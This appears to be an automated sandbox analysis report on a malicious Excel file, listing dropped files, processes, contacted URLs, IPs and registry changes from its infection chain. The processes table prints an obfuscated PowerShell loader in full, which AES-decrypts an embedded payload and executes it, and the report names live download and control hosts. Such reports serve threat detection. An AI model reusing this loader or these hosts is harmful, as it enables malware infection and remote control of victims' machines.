Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
AWD 490104998518.xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 03:46:25 2024, Security: 1
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc
|
Rich Text Format data, version 1
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D09A9DB5.doc
|
Rich Text Format data, version 1
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\note\nots.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sA.url
|
MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/sA>), ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\tny.wtf.url
|
MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/>), ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\AWD 490104998518.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 12:09:15 2024, Security: 1
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\creatednewwaterbottleforme[1].gif
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D0FB8B4.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\693B04E2.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6A024A7A.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91B46433.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{034FF383-ED64-42E0-B6D0-5EEBB3D935C9}.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{940A3EA1-C726-4A15-A0E5-47290CF79D3F}.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\eyxcmf0f.2tf.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ktearnw1.g5w.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\{AE86EE30-228F-4A13-B460-3CD7E0B95EF5}
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\{E5664471-CFDD-40CE-B80A-5F4272B38DEA}
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF1128541BFE0476BD.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF86012724870D7705.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFC865B56879478CEE.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFE4D87C1F83611F19.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
Generic INItialization configuration [xls]
|
modified
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\90530000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 12:09:15 2024, Security: 1
|
dropped
|
||
|
C:\Users\user\Desktop\90530000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 22 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
|
|
|
|
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
|
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
|
|
|
|
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged
= New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g
= [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key
= ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes
= [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes
= TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return
[System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64
= '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado
= Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado:
TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34
-cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&(
$verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
sembe.duckdns.org
|
|
||
|
http://192.3.176.174/60/WDER.txt
|
192.3.176.174
|
|
|
|
http://192.3.176.174/60/gbh/creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback.doc
|
192.3.176.174
|
|
|
|
http://192.3.176.174/60/creatednewwaterbottleforme.gIF
|
192.3.176.174
|
|
|
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
http://tny.wtf/
|
unknown
|
||
|
http://192.3.176.174
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://tny.wtf/sAyX
|
unknown
|
||
|
http://tny.wtf/sA
|
188.114.96.3
|
||
|
http://198.46.176.133/Upload/vbs.jpeg
|
198.46.176.133
|
||
|
http://geoplugin.net/json.gpQ)
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://192.3.176.174/60/creatednewwaterbottleforme.gIFj
|
unknown
|
||
|
http://go.microsoft.cxj
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://geoplugin.net/json.gpC)
|
unknown
|
||
|
http://198.46.176.133
|
unknown
|
There are 12 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
sembe.duckdns.org
|
194.187.251.115
|
|
|
|
tny.wtf
|
188.114.96.3
|
|
|
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.3.176.174
|
unknown
|
United States
|
|
|
|
188.114.96.3
|
tny.wtf
|
European Union
|
|
|
|
194.187.251.115
|
sembe.duckdns.org
|
United Kingdom
|
|
|
|
188.114.97.3
|
unknown
|
European Union
|
||
|
198.46.176.133
|
unknown
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\Software\Rmc-999Z97
|
exepath
|
|
|
|
HKEY_CURRENT_USER\Software\Rmc-999Z97
|
licence
|
|
|
|
HKEY_CURRENT_USER\Software\Rmc-999Z97
|
time
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
t/&
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28D22
|
28D22
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
|8&
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35782
|
35782
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35A02
|
35A02
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35BB7
|
35BB7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 21
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35A02
|
35A02
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
|
`d-
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
|
=d-
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
|
Version
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://tny.wtf/
|
EnableBHO
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
|
a~-
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 21
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
|
Item 21
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\3081B
|
3081B
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@Arial Unicode MS
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@Batang
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@BatangChe
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@DFKai-SB
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@Dotum
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@DotumChe
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@FangSong
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@Gulim
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@GulimChe
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@Gungsuh
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@GungsuhChe
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@KaiTi
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@Malgun Gothic
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@Meiryo
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@Meiryo UI
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@Microsoft JhengHei
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@Microsoft YaHei
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@MingLiU
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@MingLiU_HKSCS
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@MingLiU_HKSCS-ExtB
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@MingLiU-ExtB
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@MS Gothic
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@MS Mincho
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@MS PGothic
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@MS PMincho
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@MS UI Gothic
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@NSimSun
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@PMingLiU
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@PMingLiU-ExtB
|
||
|
